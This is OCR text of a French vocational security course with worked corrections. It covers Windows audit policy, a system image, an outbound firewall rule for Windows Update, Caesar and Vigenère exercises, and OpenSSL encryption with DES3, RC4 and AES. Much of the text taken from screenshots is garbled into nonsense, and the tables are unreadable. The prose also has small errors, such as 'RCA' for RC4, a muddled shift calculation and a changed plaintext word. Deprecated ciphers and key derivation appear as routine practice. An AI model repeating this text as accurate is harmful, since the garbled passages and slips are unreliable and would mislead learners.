Paramètre de sécurité locale Expliquer 


Auditer les événements de connexion 


ll est possible que ce paramètre ne soit pas appliqué si une autre 
stratégie est configurée pour avoir la priorité sur la stratégie d'audit 
au niveau de la catégorie. 

Pour obtenir davantage d'informations, consultez Auditer les 
événements de connexion. (Q921468) 
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Cette figure illustre l’activation de la journalisation des tentatives réussies et 
échouées pour les événements de connexion aux comptes 


Propriétés de: Auditer les événements de connexion aux … 


Paramètre de sécurité locale Expliquer 


Auditer les événements de connexion aux comptes 


ll est possible que ce paramètre ne soit pas appliqué si une autre 
stratégie est configurée pour avoir la priorité sur la stratégie d'audit 
au niveau de la catégorie. 

Pour obtenir davantage d'informations, consultez Auditer les 
événements de connexion aux comptes. (Q 921468) 
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Activité 4 \ 


Correction j 


Étape 5 : Définir une stratégie d'audit 
Cette figure illustre l’activation de la journalisation des tentatives réussies 
pour l’utilisation des privilèges 
Propriétés de : Auditer l'utilisation des privilèges 


Paramètre de sécurité locale Expliquer 


N Auditer l'utilisation des privilèges 


Auditer les tentatives des types suivants : 
M] Réussite 
[C] Échec 


EN ll est possible que ce paramètre ne soit pas appliqué si une autre 
Œ stratégie est configurée pour avoir la priorité sur la stratégie d'audit 
au niveau de la catégorie. 
Pour obtenir davantage d'informations, consultez Auditer l'utilisation 
des privilèges. (Q921468) 
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Cette figure illustre l'activation de la journalisation des tentatives réussies pour 
l’accès aux objets 


Propriétés de : Auditer l'accès aux objets 
Paramètre de sécurité locale | Expliquer 


Auditer l'accès aux objets 


Auditer les tentatives des types suivants : 
Réussite 
[C Échec 


EN | est possible que ce paramètre ne soit pas appliqué si une autre 
da stratégie est configurée pour avoir la priorité sur la stratégie d'audit 
au niveau de la catégorie. 
Pour obtenir davantage d'informations, consultez Auditer l'accès 
aux objets. (Q921468) 
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Correction | OFPPT BE THE CHANGE 


Étape 5 : Définir une stratégie d’audit 


Cette figure illustre la configuration finale de la stratégie d'audit définie 


à Stratégie de sécurité locale 
Fichier Action Affichage ? 


e| amle] u m 


B Paramètres de sécurité Stratégie Paramètre de sécurité 
v [} Stratégies de comptes 
> La Stratégie de mot de passe 
> LA Stratégie de verrouillage du comp 
LA Stratégies locales 


> LA Stratégie d'audit 


Lx] Auditer l'accès au service d'annuaire Pas d'audit 
Lx] Auditer l'accès aux objets Réussite 
Lx] Auditer l'utilisation des privilèges Réussite 
Lx] Auditer la gestion des comptes Pas d'audit 


TÄ Attribution des droits utilisateur Lx] Auditer le suivi des processus Pas d'audit 
Là Options de sécurité Lx] Auditer les événements de connexion Réussite, Échec 


[£] Pare-feu Windows Defender avec fon Li] Auditer les événements de connexion aux comptes Réussite, Échec 
Stratégies du gestionnaire de listes de Lx] Auditer les événements système Réussite, Échec 
(5) Stratégies de clé publique Lx] Auditer les modifications de stratégie Pas d'audit 

E] Stratégies de restriction logicielle 

C] Stratégies de contrôle de l'application 
© Stratégies de sécurité IP sur Ordinatev 
E Configuration avancée de la stratégie 
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Correction $ 


Étape 6 : Exécuter la restauration du système et créez un point de restauration. 


Ces figures illustrent les étapes de création d’un point de restauration 


È 


IÈ Créer une image syrème E È Créer une image syalème € M Créer une image systéme 


Où voulez vous enregistrer la sauvegarde ? Où voulez-venrs enregistrer la sauvegarde ? Confirmez les paramètres de sauvegarde. 


Urne image yyxtime it une cope dia bectoure nicer à l'exécution du Windows. Ele peut sumi Une image système est une copie des lectours nécessaires à l'exécution de Windows Elle pout assi Eng: 

comprendre des lecteurs supplémentaires. Line image cyctème peut servr à restaurer votre comprende des lecteurs aupplémentares. Line image système peut servir à retaurer votre DATA HOO (Ei 

ordeseur 5 votre lecteur de asque cu ordinateur s artte detonchonner, Cependant vaus ne ordinateur si votre lecteur de disque ou crcneteur s'amête de fonchonner, Cependant, vous ne — (E) 

pouvez gas sélecdonner d Sèmems indwduds å restaures. pouvez pas sélectionne d'éléments individuals à restaures. La sauvegarde peut o 118 Go espace disque. 


@ Sur un dique dur @ Sur un isque cur 
— DAIA HOO (E9: 121,07 Go de litres 


Les lecteurs ustewnts semm wevegerdin : 


O Sur un ou plusen Recherche de penphénques de sauvegarde.. Oime aj Pan du systeme EF! 


= Lecteur DWD AW (F:} | LÉ SYSTEME SSD (C) (Système) 


Enviecenermant de écupéden Winduses (Systime) 


O) Sur un partage rseau O Sur un portage réseau 
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. BE THE CHANGE L~ 
Correction 


Etape 7 : Configurer des régles de sécurité pour le pare-feu Windows 


Cette figure illustre l'interface de configuration du pare-feu Windows 


À Pare-feu Windows Defender avec fonctions avanctes de sécurté 

Fichier Action Aéfichege 7 

-+|m Bim 

À Pare-feu Windows Defender sv) Pare teu Windows Defender avec tonctions avancées de sécurité sur Ordinateur local 
E Règles de tratic entrant à 
R Régies de trafic sortant at Le Pare teu Windows Defender avec tonctore avancées de sécurté offe une sécu réseau paur kes orcinat) ; 
Sig Règles de sécurité de conne Windows. a 

» BE Analyse | Ge Exporter ls strategie... 

Vue d'ensemble Restaurer la stratége per défaut 

Profil de domaine Dagnestiquer / Réparer 

© Le Pare feu Vindows Defender est activé. 

Q Les connedans errantes qu ne corespondent pas à une régle sont bioquées. 

ə Les connedens sanamea qi ne cameponderi pas 3 une règie sori aurorséss 

Le profil privé est actif 

© Le Pornfeu Vénus Defence eri activé 

Q Les connenons errantes qu ne comeepondert pas à une règle sont bioquées 

@ Les cons sortaries qui ne corespondent pas à une règle sont autoredes 

Profil public 

È Le Pare teu Vindowa Defenderest active. 

8 Les cownedens enrartes qu ne corespandert pas à une rage sart bioguéas 

2 Las arniarna acrlanies pi na Conmepordant paa à una ga sori aa formes 


Athichage 
4 Actualiser 

Propriétés 

Aide 


E Faprétés cu Parteu Windows Defende 


Démarrer 
Authentifier les communications entre les ordinateurs 


Comme chee reges de pecans de moneen afm de meche comment et quand bee conmeonne erie less orkeateurs eur 
mPortiiies ot prodigies à! aide de Le sécurté do orotecebs hianat (Pace) 


E Pages de sécuré de ocnmecon 
Afficher et créer des règles de pare-feu 
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LA 
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Correction J| 
Étape 7 : Configurer des règles de sécurité pour le pare-feu Windows 
Dans cette fenêtre, il suffit de sélectionner Personnalisée puis de cliquer Dans cette fenêtre, sélectionnez Personnaliser , sélectionnez ensuite Appliquer 
sur Suivant à ce service et défilez la liste pour sélectionner Windows Update et cliquez sur 


OK et ensuite sur Suivant 


@ Assistant Nouvelle règle de trafic sortant 
Type de règle 
Sélectionnez le type de règle de pare-feu à créer. 
Étapes : 

Type de règle 


Spéctez le chemin d'accès complet au programme et le nom du fichier exécrable du programme auquel comespond cette régle 
Appliquer celle règle comme a . 


Programme © Appliquer à tous les programmes et services 
Protocole et ports © Programme O Appliquer aux services uniquement 
Règle qui contrôle les connexions d'un programme. @ Apphquer à ce sernce : 


Quel type de règle voulez-vous créer ? 


Action © Port i Nom Nom court 
Règle qui contrôle les connexions d'un port TCP ou UDP. LE Wari TSve WapltTSve 
Pee AWC Assistant 
Prédéfinie : 
O LE WebCierr 


@FirewallAPI.dil-80200 LE Windows Connect Now - Registre de configuration 
Règle qui contrôle les connexions liées à l'utilisation de Windows. CE Windows Installer 

© a LE Windows Mued Realty OpenXR Service 
ie ee Nerds eard: 


oau A Manac 
O Appliquer au serice ce nom cout par exemple : evertiog) 


PARTIE 2 
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Correction J| 


Étape 7 : Configurer des règles de sécurité pour le pare-feu Windows 


Dans cette fenêtre, il suffit de sélectionner TCP comme protocole, puis de Dans cette fenêtre, conservez les paramètres par défaut et cliquez sur 
cliquer sur Suivant Suivant 


2 Assistant Nouvelle régle de trafic sortant 2 Assistant Nouvelle régle de trafic sortant 


Etendue 
Spécifiez les adresses |P locales et distantes auxquelles s'applique cette règle. 


Protocole et ports 

Spécifiez les protocoles et les ports auxquels s'applique cette règle. 
Étapes : Étapes : 

@ Type de règle 

>- Rop À quelles adresses IP locales cette règle s’applique-elle ? 
@ Protocole et ports @ Toute adresse IP 

ə O Ces adresses IP : 
L 
e 
a 


ë iphar À quels ports et protocoles cette règle s'appliquet-elle ? 


@ Programme 

@ Protocole et ports 
@ Étendue 

@ Action 

@ Profil 


Ajouter. 


Modifier.. 


@ Nom : Tous les ports | 
Supprimer 


Exemple : 80, 443, 5000-5010 


Tous les ports Personnaliser les types d'interfaces auxquels cette règle s'applique : F TS 7 


À adresses IP distantes cette règle s° -elle ? 
Exemple : 80, 443, 5000-5010 quelles es cette règle s’applique+ 


Paramètres ICMP (Intemet Control Perso © Toute adresse IP 
Message Protocol) : O Ces adresses IP : 


Ajouter 
Modifier 


Supprimer 
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Correction || 


Étape 7 : Configurer des règles de sécurité pour le pare-feu Windows 


Dans cette fenêtre, il suffit de sélectionner Autoriser la connexion, puis de Dans cette fenêtres, sélectionnez tous les profils (Domaine, Privé et 
cliquer sur Suivant Publique) puis cliquez sur Suivant 


@ Assistant Nouvelle régle de trafic sortant @ Assistant Nouvelle régle de trafic sortant 


Action Profil 
Spécifiez une action à entreprendre lorsqu'une connexion répond aux conditions spécifiées dans la règle. Spécifiez les profils auxquels s'applique cette règle. 
Étapes : 
Quelle action entreprendre lorsqu'une connexion répond aux conditions spécifiées ? Type de règle Quand cette règle est-elle appliquée ? 


Programme 


Protocole et ports Domaine 
Étendre Lors de la connexion d'un ordinateur à son domaine d'entreprise. 


@ Autoriser la connexion 
Cela comprend les connexions qui sont protégées par le protocole IPsec, ainsi que celles qui 
ne le sont pas. 

© Autoriser la connexion si elle est sécurisée Action M] Privé 
Cela comprend uniquement les connexions authentifiées à l'aide du protocole IPsec. Les RUE ` A 2e 5 
ne me jétés et rèdi Profil ee eee ee cee te ee ee 
IPsec du nœud Règle de sécurité de connexion. a j 


Personnaliser. Lors de la connexion d'un ordinateur à un emplacement public. 


O Bloquer la connexion 
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Étape 7 : Configurer des règles de sécurité pour le pare-feu Windows 


Dans cette fenêtre il suffit de définir le nom de la règle, "Autoriser le service Windows Update", puis de cliquer sur Terminer 


ÉÈ Assistant Nouvelle règle de trafic sortant 


Nom 
Spécfier le nom et la description de cette régle 


Nom : 


Descnpbon fecuitatt) : 
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Activité 4 à © WEBFORCES 


. BE THE CHANGE < 
Correction }, 


Étape 7 : Configurer des règles de sécurité pour le pare-feu Windows 


Cette interface illustre que la nouvelle règle définie a été ajoutée avec succès au pare-feu et apparaît dans la liste des règles 


EÈ Pare-feu Windows Defender avec fonctions avancée: de sécunté 
Fichier Action Affichage 7? 


e» am =| Em 


N 
= 
m 
< 
a. 


M Règles de trafic entrant 

ES Rò gks de trafic sortant 

Mu Règles de sécurité de con 
> © Anatyse 


Nom 

© Autoriser le service Windows Update 
D DF iresi 48-0204 

O Skype 

O Stype 

© Affichage sans A [TCP sortant) 

© Affichage sam A [UDP sortant) 

Assatance à ditance [PRNP - on sortis) 
© Assistance à distance [PRNP - en sortie) 
© Assistance à distance (SSDP TCP. en sort.. 
@ Assstance 3 distance [SSDP UDP - en sor... 

Assatance 2 distance (ICP-Sorte) 
© Assctance t dutance (ICP-Sorte) 
© Assatance è distance [Trafic sortant ICP s.. 
© Astuces Microsoft 

Chent de mise en cache hébergé de Brens.. 

Découverte d'hemoloque de DranchCac. 

Extraction du contenu de BesnchCache (.. 

Serveur de cache hébergé de BranchCec., 
O Coloviatrice Windows 
© Comins Windows 
© Cartes Windows 
o Compagnon de la console Xbor 
o Compte professerrel cu scolare 
O Contenu Micresont 


Coordinateur de transactions distnbudes … 


Coordinateur de transactions distnbudes ... 
© Cortana 
© Coumer et calendrier 
OB Mdcnincerte de ricam: Wi-Fi Direret (Sortie 
< 


Geoupe 


OF rewalAPi oil -00000 
478€ 1C003-2963-476€-6926. Tour Qui 
478E1C008-29F3-4766-6026. Tout Qui 
Aéfichage sans fil Tnt Qui 
Affichage sena fil Tat Qui 
Assistance à stance Pubie New 
Assistance à distance Doma.. 
Assistance à dstance 
Assistance à distance 
Assistance à cistance 
Asnstance à castance 
. Aenstance à chstance 
Astuces Microsoft 
DranchCeche - Client de rv... 
BranchCeche - Découverte .. 
BranchCsche - Extraction d.. 
BranchCache - Serveur de c... 
Calculetrice Windows 
Caméra Windows 
Cartes Windiran 
Cornpagren du la consal X.. 
Compte peotessionnel ou s.. 
Conteneo Microsoft 
Cowdinsteur de transaction. 
Coordinsteur de transaction. 
Cortans 
Coumes et calendner 
Dreams de réera Wi-Fi. 
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PARTIE 3 


DÉCOUVRIR LA CRYPTOGRAPHIE ET LES 
SOLUTIONS DE GESTION ET DE PARTAGE 
DE CLÉS 


Dans ce module, vous allez : 


Chiffrer et déchiffrer des textes en utilisant des algorithmes 
de chiffrement classique 


Utiliser OpenSSL pour chiffrer, déchiffrer, et signer des 


textes, générer des clés, mettre en place une PKI, et générer 
des certificats numériques 


orver … WEBFORCE + ACTIVITÉ 1 


APPLICATION DES TECHNIQUES DE 
CHIFFREMENT CLASSIQUES 


Compétences visées : 


e  Chiffrer des textes en utilisant des algorithmes de 
chiffrement classique 


e Déchiffrer des textes en utilisant des algorithmes de 
chiffrement classique 


Recommandations clés : 


e  Maitriser les principes des algorithmes de chiffrement 
classique, en particulier César et Vigenère 


| CONSIGNES 
O  WEBFORCE» 


AT BE THE CHANGE L ~ 


1. Pour le formateur 


° Vapprenant doit être capable de chiffrer un texte en claire avec le chiffrement de 
César et Vigenère 


° Il doit être également capable de déchiffrer un texte chiffré avec le chiffrement de 
César et Vigenère 


2. Pour l’apprenant 


” ° Il est recommandée de maitriser les principes des algorithmes de chiffrement 
z classique, en particulier César et Vigenère 


Conditions de réalisation : 


D 


Aucune condition exigée 


4. Critères de réussite : 
° Avoir un texte chiffré lorsqu’on part d’un texte en claire 


° Avoir un texte en clair (qui a un sens) en partant d’un texte chiffré 


OFPPT BE THE CHANGE C~ 


N 
Activité 1 À G0) wi prORCES 
Application des techniques de chiffrement classiques J ee 
Jj 


Exercice 1 : Chiffrement de César 


e l'objectif de cette exercice est d'essayer de chiffrer et déchiffrer des textes en utilisant l'algorithme de César. Pour cette raison, vous êtes chargés d'effectuer les tâches 
suivantes 


1. Chiffrez le texte suivant, avec le chiffrement de César, sachant que la distance de décalage est 5. 


e Texte en claire : cet exercice entre dans le cadre de chiffrement classique 


2. Déchiffrez le texte suivant, qui a été avec le chiffrement de César, sachant que la distance de décalage est 7. 


e Texte chiffré:shcpllzailssl 


3. Déchiffrez le texte suivant, qui a été avec le chiffrement de César, sachant que le premier mot du texte claire estle. 


e Texte chiffré:ohvrohloeulooh 
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Exercice 2 : Chiffrement de Vigenère 


e _ L'objectif de cette exercice est d’essayer de chiffrer et déchiffrer des textes en utilisant le chiffrement de Vigenère. Pour cette raison, vous êtes chargés d'effectuer les 
tâches suivantes : 


1. Chiffrez le texte suivant, avec le chiffrement de Vigenère en utilisant la clé EXERCICE. 


e Texte en claire : CHIFFRE DE VIGENERE 


2. Déchiffrez le texte suivant, qui a été avec le chiffrement de Vigenère en utilisant la clé EXERCICE. 


e Texte chiffré : PBWFNMKPFOMCNM 
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Exercice 1 : Chiffrement de César 


1. Pour chiffrer un texte avec le chiffrement de César avec une distance de décalage égale à 5, il faut préparer le tableau de correspondance de l'alphabet, comme suit : 


a APEGEEG AME stab El ES Geb pe ie 


arm onconsens E TOC O0 OUT ENERO EEG 


e Ensuite, il faut chercher les correspondances de chaque lettre dans le texte claire comme suit : 


we DOECO E e E TTC OC eda E EEE 


e Texteenclaire:cet exercice entre dans le cadre du chiffrement classique 


e Texte chiffré: hjy jcjwhnhj jsywj ifsx qj hfiwj iz hmnkkwjrjsy hqfxxnvzj 
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Exercice 1 : Chiffrement de César 


2. Pour déchiffrer un texte qui a été avec le chiffrement de César avec une distance de décalage égale à 7, il faut préparer le tableau de correspondance de l'alphabet, 


RSR ekee e E e E EE 


comme suit : 


Se Ee 


e Ensuite, il faut chercher les correspondances de chaque lettre dans le texte chiffré comme suit : 


ome e 


e Texte chiffré : sh cpl Iza ilssl 


e Texteenclaire: la vie est belle 
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Exercice 1 : Chiffrement de César 


e Pour déchiffrer un texte chiffré avec le chiffrement de César, il faut alors calculer la distance de chiffrement en premier lieu. 


e Le premier mot du texte claire est le, tandis que le premier mot du texte chiffré est oh alors : 


=, 


e Position de la lettre o dans l’alphabet est 14 
e Position de la lettre L dans l'alphabet est 11 , | 
— Distance est alors égale à 3 (14-11=7-4=3) 
e Position de la lettre h dans l’alphabet est 7 


e Position de la lettre e dans l'alphabet est 4 


= 


e Préparez ensuite le tableau de correspondance de l'alphabet, comme suit : 


a e REE Heee ee e e 


E t ele 


e Ensuite, il faut chercher les correspondances de chaque lettre dans le texte chiffré comme suit : 


ome eel eleele 


e Texte chiffré : oh vrohlo eulooh 


e Texteenclaire: le soleil brille 
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Exercice 2 : Chiffrement de Vigenère 


1. Pour chiffrer le texte CHIFFRE DE VIGENERE avec le chiffrement de Vigenère en utilisant la clé EXERCICE , il faut suivre les étapes suivantes : 


e Préparez un tableau contenant les positions des lettres de l'alphabet : 


atprobet ENE ee ee 


eostion EMER RES SEA |a |as |a fas] 16] 17 |as] is |0 | a | 


e Préparez un deuxième tableau comme suit : 


e La première ligne : Mettez les lettres du texte en claire dans la première ligne. Chaque case contient une lettre. 

e La deuxième ligne : En se référant au tableau des positions, déterminez la position de chaque lettre du texte en claire pour remplir la deuxième ligne. 
e La troisième ligne : Mettez les lettres du mot clé, EXERCICE dans notre exemple, autant de fois jusqu’à remplir tous les colonnes du tableau. 

e La quatrième ligne : En se référant au tableau des positions, déterminez la position de chaque lettre du mot clé pour remplir la quatrième ligne. 

e La cinquième ligne : Calculez les positions des lettres du texte chiffré en appliquant la formule c; = (pi + ki mod m) mod 26. 


e La sixième ligne : Identifiez le texte chiffré en partant des positions calculées et en se référant au tableau des positions. 


(ag) 
= 
| 
< 
[ai 


Copyright - Tout droit réservé - OFPPT 142 


Activité 1 | XO WEBFORCEs 


j OFPPT BE THE CHANGE 
Correction 


Exercice 2 : Chiffrement de Vigenère 


e Le tableau en résultant est le suivant : 


GAR 
Tacs 
Cafe 

CLÉ 


See ES 
RE | | | Ss 
ENS eae Lee 
DEN EN EE EE EE EE 


17 


LE 


7 


| Powe | 6 | 
CHIFFRE cal 


E 


AEE 
ae Ea 
See 


e Le résultat est le suivant : 
e Texte en clair : CHIFFRE DE VIGENERE 
e Clé: EXERCICE 
e Texte Chiffré : GEMWHZGHISMXGVGVI 
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Exercice 2 : Chiffrement de Vigenère 


2. Pour déchiffrer le texte PBWFNMKPFOMCNM, qui a été fait avec le chiffrement de Vigenère en utilisant la clé EXERCICE, il faut suivre les étapes suivantes : 


e Préparez un tableau contenant les positions des lettres de l'alphabet : 


ome Acc {ole | ri e|x [ils |«(ejminjolrlalrei{s|riulv 


DEN | 2 | 2] 3 fa] s |e | 7] | 9 |i] ji] a3 | aa | as | a6 | a7 | 20 | a9 | 20 | an | 22 | 2 | 20 | 25 | 


e Préparez un deuxième tableau comme suit : 


e La première ligne : Mettez les lettres du texte chiffré dans la première ligne. Chaque case contient une lettre. 

e La deuxième ligne : En se référant au tableau des positions, déterminez la position de chaque lettre du texte chiffré pour remplir la deuxième ligne. 
e La troisième ligne : Mettez les lettres du mot clé, EXERCICE dans notre exemple, autant de fois jusqu’à remplir tous les colonnes du tableau. 

e La quatrième ligne : En se référant au tableau des positions, déterminez la position de chaque lettre du mot clé pour remplir la quatrième ligne. 

e La cinquième ligne : Calculez les positions des lettres du texte en clair en appliquant la formule p; = (ci + 26 — ki mod m) mod 26. 


e La sixième ligne : Identifiez le texte en clair en partant des positions calculés et en se référant au tableau des positions. 
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Correction 


Exercice 2 : Chiffrement de Vigenère 


e Le tableau en résultant est le suivant : 


STS EE A AC EP RE PE OA EE EE 
SE NE I EEE 
ak pepe pue) pepe ee 


Se SCS Ce Ce 
Crem Ce 
aan [o e e e e e o e e e o 


e Le résultat est le suivant : 
e Texte chiffré:PBWFNMKPFOMCNM 
e Clé: EXERCICE 
e Texteenclaire:LE SOLEIL BRILLE 
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La Voie de l'Avenir 8 


CHIFFREMENT/DÉCHIFFREMENT 
SYMÉTRIQUE GRÂCE À OPENSSL 


Compétences visées : 


e Chiffrer des fichiers en utilisant des algorithmes de 
chiffrement symétriques grace a OpenSSL 


e Déchiffrer des fichiers en utilisant des algorithmes de 
chiffrement symétriques grace a OpenSSL 


e Générer des clés symétriques 


Recommandations clés : 


e  Maitriser le principe d’un système de chiffrement symétrique 


CONSIGNES 


KO WEBFORCE » 


THE CHANGE ~~ 


OFPPT 


La Voie de l'Avenir BE 


1. Pour le formateur 


° Vapprenant doit être capable de chiffrer/déchiffrer des fichiers avec des algorithmes 
de chiffrement symétriques en utilisant OpenSSL 


° Il doit être également capable de générer des clés de chiffrement symétrique 


2. Pour l’apprenant 


° Il est recommandée de maitriser le principe de chiffrement symétrique 
° Il faut utiliser les commandes fournies au début de l’activité 
° Il est également recommandée de suivre les étapes décrites dans l'énoncé 


3. Conditions de réalisation : 


° VirtualBox installé 


° Une machine Virtuelle Ubuntu. Lien de téléchargement de la VM Ubuntu : 
https://www.osboxes.org/ubuntu/#ubuntu-21-10-info 


4. Critères de réussite : 

° Générer un fichier chiffré à partir d’un fichier en claire 
° Générer un fichier claire à partir d’un fichier chiffré 

e Générer une clé symétrique 


° Utiliser avec succès les différents types d’algorithmes de chiffrement symétriques 


NS 
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Présentation de OpenSSL 


e OpenSSL est une bibliothèque cryptographique open source qui implémente Secure Sockets Layer (SSL) et Transport Layer Security (TLS). 


e OpenSSL fournie un ensemble de commandes exécutables en ligne de commande et permettant d'offrir plusieurs fonctionnalités telles que : 


Le chiffrement et le déchiffrement : plusieurs algorithmes de chiffrement sont implémentés dans OoenSSL tel que RSA, DES, IDEA,AES, RC4,etc.. 


Le calcul d’empreinte numérique : plusieurs fonctions de hachage sont implémentés tel que MD5, SHA, etc.. 
e La forge de clef RSA 


e La création de certificat X509 


e Le syntaxe d’une commande OpenSSL est la suivante : 


openssl <commande> <options> 


Copyright - Tout droit réservé - OFPPT 


W 


EBFORCE » 


pE THE CHANGE | — 


148 


Chiffrement/déchiffrement symétrique grâce à epee 


Présentation de OpenSSL 


XO 


A eee 


e l'objectif principal de cette activité est de se familiariser à l’utilisation d’OpenSSL en essayant de réaliser le chiffrement et le déchiffrement symétrique 


e Le tableau ci-dessous fournit les commandes nécessaires pour la réalisation du chiffrement et du déchiffrement : 


openssl enc <-algo> -in <claire.txt> -e -out <chiffre.enc> 


openssl enc <-algo> -in <chiffre.enc> -d -out <claire.dec> 


openssl rand -out <clé.key> <nombre_bits> 


openssl aes-256-cbc -in <claire.txt> -out <chiffre.enc> -e -k <clé.key> 


L'option -a 


(ag) 
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Permet de générer un fichier avec un contenu -e : encrypt > chiffrer 
chiffré <chiffre.enc> à partir d’un fichier avec 
un contenu en texte clair <claire.txt> en 

utilisant un algorithme de chiffrement <algo> -out: Output file > fichier résultant 


-in : Input file > fichier en entrée 


Permet de générer un fichier avec un contenu 
déchiffré <claire.dec> à partir d’un fichier avec 
un contenu chiffré <chiffre.enc> en utilisant un 
algorithme de chiffrement <algo> 


-d : decrypt > déchiffrer 


Génère un nombre aléatoire de taille nombre_bits 


Chiffrer un fichier avec l’AES et une clé. Pour déchiffrer, il suffit de changer l’option —e à - 
d 


Vajout de cette option aux commandes précédentes permet de produire un fichier lisible 
qui est codé en base64 
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Travail demandé 


e Comme cité précédemment, l'objectif principal est d'utiliser OpenSSL pour chiffrer et déchiffrer des fichiers. Pour ce faire, vous êtes chargés dans cette activité 
d'effectuer les tâches suivantes : 


1. 
2. 
3 
4 
5 
6. 
7 
8 
9 


10. Répétez les étapes 325 en utilisant comme algorithme de chiffrement AES et la clé Key générée dans la question précédente. 


Vérifiez que OpenSSL est installé dans votre machine Ubuntu et déterminez sa version en tapant la commande : openssl version [-a] ; 


Créez un fichier, nommé message, qui inclut le texte suivant : 


Bonjour tout le monde ! 


Ce document est utilisé pour tester le chiffrement/déchiffrement symétrique avec OpenSSL. 


Chiffrez le fichier message avec l'algorithme de chiffrement DES3. Le fichier chiffré est nommé message.enc ; 
Déchiffrez le fichier message.enc. Le fichier déchiffré est nommé message.dec ; 
Vérifiez que les deux fichiers message et message.dec contiennent le même contenu ; 


Affichez le contenu du fichier message.enc ; 


Répétez les étapes 36 en utilisant l'option -a ; 


Répétez les étapes 35 en utilisant comme algorithme de chiffrement RCA ; 


Générez une clé symétrique, nommé Key, de taille 512 bits ; 
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Correction 


e Pour vérifier que OpenSSL est bien installé dans votre machine Ubuntu et déterminer sa version, il est possible de taper l’une des deux commandes suivantes: 
e Openssl version 
e Openssl version -a 


e Les résultats des deux commandes précédentes sont illustrés dans les deux figures ci-dessous. Selon les résultats obtenus, la version OpenSSL est 1.1.1L : 


:-$ openssl version -a 
24 Aug 2021 
: Wed Mar 9 12:06:18 2022 UTC 
: debian-amd64 
bn(64,64) rc4(16x,int) des(int) blowfish(ptr) 

: gcc -fPIC -pthread -m64 -Wa,--noexecstack -Wall -Wa,--n 
oexecstack -g -02 -ffile-prefix-map=/build/openssl-WgLPFV/openssl 
-1.1.1l=. -flto=auto -ffat-lto-objects -fstack-protector-strong - 
Wformat -Werror=format-security -DOPENSSL TLS SECURITY LEVEL=2 -D 
OPENSSL USE NODELETE -DL ENDIAN -DOPENSSL PIC -DOPENSSL CPUID OBJ 

-DOPENSSL IA32 SSE2 -DOPENSSL BN ASM MONT -DOPENSSL BN ASM MONTS 
-DOPENSSL BN ASM GF2m -DSHA1 ASM -DSHA256 ASM -DSHA512 ASM -DKEC 
CAK1600 ASM -DRC4 ASM -DMD5 ASM -DAESNI ASM -DVPAES ASM -DGHASH A 
SM -DECP NISTZ256 ASM -DX25519 ASM -DPOLY1305 ASM -DNDEBUG -Wdate 
-time -D FORTIFY SOURCE=2 
OPENSSLDIR: "/usr/lib/ssl" 
ENGINESDIR: "/usr/lib/x86 64-linux-gnu/engines-1.1" 
Seeding source: os-specific 


:-$ openssl version 
OpenSSL 1.1.11 24 Aug 2021 
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Chiffrement avec DES3 


e Pour créer un fichier, nommé message, il suffit d'exécuter la commande : nano message. 


e Le contenu sera écrit dans le fichier crée, comme illustré dans la figure ci-dessous. 


GNU nano 5.6.1 message * 


Bonjour tout le monde ! 
Ce document est utilisé pour tester le chiffrement/déchiffrement® 


e Pour chiffrer le fichier message avec l’algorithme de chiffrement DES3, il suffit d'exécuter la commande suivante : openssl enc -e -des3 -in message -out message.enc 


> openssl enc -e -deS3 -1n message -OUT mess 
enter des-ede3-cbc encryption password: 
Verifying - enter des-ede3-cbc encryption password: 
*** WARNING : deprecated key derivation used. 
Using -iter or -pbkdf2 would be better. 


e Pour déchiffrer le fichier message.enc, il suffit d'exécuter la commande suivante : openssl enc -d -des3 -in message.enc -out message.dec 


$ openssl enc -d -des3 -in message.enc -out message.dec 
enter des-ede3-cbc decryption password: 
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*** WARNING : deprecated key derivation used. 
Using -iter or -pbkdf2 would be better. 
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Chiffrement/Déchiffrement avec DES3 


e Pour vérifier que les deux fichiers message et message.dec contiennent le même contenu, il est possible d'exécuter la commande : diff message message.dec 


e Notez que la commande diff permet de comparer les deux fichiers ligne par ligne. L'absence de sortie prouve que les deux fichiers sont similaires. 


:-$ diff message message.dec 
~$ 


e |l est possible d'exécuter la commande tail -f message.enc pour afficher le contenu du fichier message.enc 


:-$ tail -f message.enc 


Salted _ 
COGpOCix GCOGGESE3ROG 


ZKGOG!E GeQG1GGsee6 


m 
= 
| 
< 
[a 


e Le contenu du fichier message.enc n’est pas lisible a cause de l’absence de l'option -a. 
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Chiffrement/Déchiffrement avec DES3 : Utilisation de l’option -a 


e Pour chiffrer le fichier message avec l'option -a, il suffit d'exécuter la commande suivante : openssl enc -e -des3 -in message -out message2.enc -a 


:-$ openssl enc -e -des3 -in message -out message2.enc -a 
enter des-ede3-cbc encryption password: 
Verifying - enter des-ede3-cbc encryption password: 


*** WARNING : deprecated key derivation used. 
Using -iter or -Pbkdf2 would be better. 


e Pour déchiffrer le fichier message2.enc, il suffit d'exécuter la commande suivante : openssl enc -d -des3 -in message2.enc -out message2.dec -a 


:-$ openssl enc -d -des3 -in message2.enc -out message2.dec -a 
enter des-ede3-cbc decryption password: 
*** WARNING : deprecated key derivation used. 
Using -iter or -pbkdf2 would be better. 


e Pour vérifier que les deux fichiers message et message2.dec contiennent le même contenu, il est possible d’exécuter la commande : diff message message2.dec 


:~$ r“ message message2.dec 
:~$ 


e |l est possible d'exécuter la commande tail -f message.enc pour afficher le contenu du fichier message2.enc 


:-$ tail -f message2.enc 
U2FsdGVkX18k/4DPIhOSImOtOLb8po6abI 1tdhFawm7qwt5RX01gXL63izrgbw2m 
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MeGrWFw1bXrV84cGGIb6GRBVPjVVtrSnC1z8fST23mH9vSyp/HXCFCEAYWQGX1 1b 
PWPgCSuAQN6DVh7+Jm/iAk3qgPZlLHZ3JLQTseYpuSM4V 1VkLJ83WF2w== 
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Chiffrement/Déchiffrement avec RC4 


e Pour chiffrer le fichier message avec l'algorithme de chiffrement RC4, il suffit d'exécuter la commande suivante : openssl enc -e -rc4 -in message -out messageRC.enc 


$ openssl enc -e -rc4 -in message -out messageRC.enc 
enter rc4 encryption password: 
Verifying - enter rc4 encryption password: 


*** WARNING : deprecated key derivation used. 
Using -iter or -pbkdf2 would be better. 


e Pour déchiffrer le fichier messageRC.enc, il suffit d'exécuter la commande suivante : openssl enc -d -rc4 -in messageRC.enc -out messageRC.dec 


$ openssl enc -d -rc4 -in messageRC.enc -out messageRC.dec 
enter rc4 decryption password: 
*** WARNING : deprecated key derivation used. 
Using -iter or -pbkdf2 would be better. 


e Pour vérifier que les deux fichiers message et messageRC.dec contiennent le même contenu, il est possible d'exécuter la commande : diff message messageRC.dec 


._$ diff message messageRC.dec 
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Génération d'une c lé cumétriaue et chiffrement /déchiffrement AES 
veneration a une cie Symetrique et Cnirrrement/ decniriremen à 


